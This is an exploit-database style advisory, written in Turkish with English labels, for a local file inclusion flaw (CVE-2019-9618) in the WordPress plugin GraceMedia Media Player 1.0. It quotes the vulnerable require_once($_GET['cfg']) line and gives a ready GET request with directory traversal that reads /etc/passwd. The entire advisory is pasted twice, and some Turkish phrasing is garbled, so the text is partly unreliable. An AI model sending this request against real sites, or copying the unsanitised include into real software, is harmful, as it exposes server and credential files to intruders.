# Exploit Title / Exploit Başlığı : WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion
# Date / Tarih: 13-02-2019
# Original Date / İlk sürülme tarihi : February 06, 2019/Şubat 06, 2019
# Author / Ekleyen: MANUEL GARCÍA CÁRDENAS
# Version / Versiyon: 1.0
# Category / Kategori: Webapps
# Tested on / Test edilen platform: Php
# CVE: 2019-9618
Açıklama:
**
GraceMedia Player , web sitenize API kullanarak doğrudan video eklemenizi sağlayan bir wordpress eklentisidir.
**
**
Güvenlik Açığı Türü:
Vulnerability-Local File Inclusion
**
**
Güvenlik Açığı :
Bu dosya younda açık bulundu:
/gracemedia-media-player/templates/files/ajax_controller.php
Açık için önce bu kodu ekleyin:
require_once($_GET['cfg']);
(cfg yazan yere kendi yerel dosyalarınızın yolunu ekleyin)
Bu açık sadece http 1.0 sürümlerinde kullanılabilir.
**
Örnek :
GET İsteği:
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
Exploit Adresi : https://www.exploit-db.com/exploits/46537
# Date / Tarih: 13-02-2019
# Original Date / İlk sürülme tarihi : February 06, 2019/Şubat 06, 2019
# Author / Ekleyen: MANUEL GARCÍA CÁRDENAS
# Version / Versiyon: 1.0
# Category / Kategori: Webapps
# Tested on / Test edilen platform: Php
# CVE: 2019-9618
Açıklama:
**
GraceMedia Player , web sitenize API kullanarak doğrudan video eklemenizi sağlayan bir wordpress eklentisidir.
**
**
Güvenlik Açığı Türü:
Vulnerability-Local File Inclusion
**
**
Güvenlik Açığı :
Bu dosya younda açık bulundu:
/gracemedia-media-player/templates/files/ajax_controller.php
Açık için önce bu kodu ekleyin:
require_once($_GET['cfg']);
(cfg yazan yere kendi yerel dosyalarınızın yolunu ekleyin)
Bu açık sadece http 1.0 sürümlerinde kullanılabilir.
**
Örnek :
GET İsteği:
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
Exploit Adresi : https://www.exploit-db.com/exploits/46537
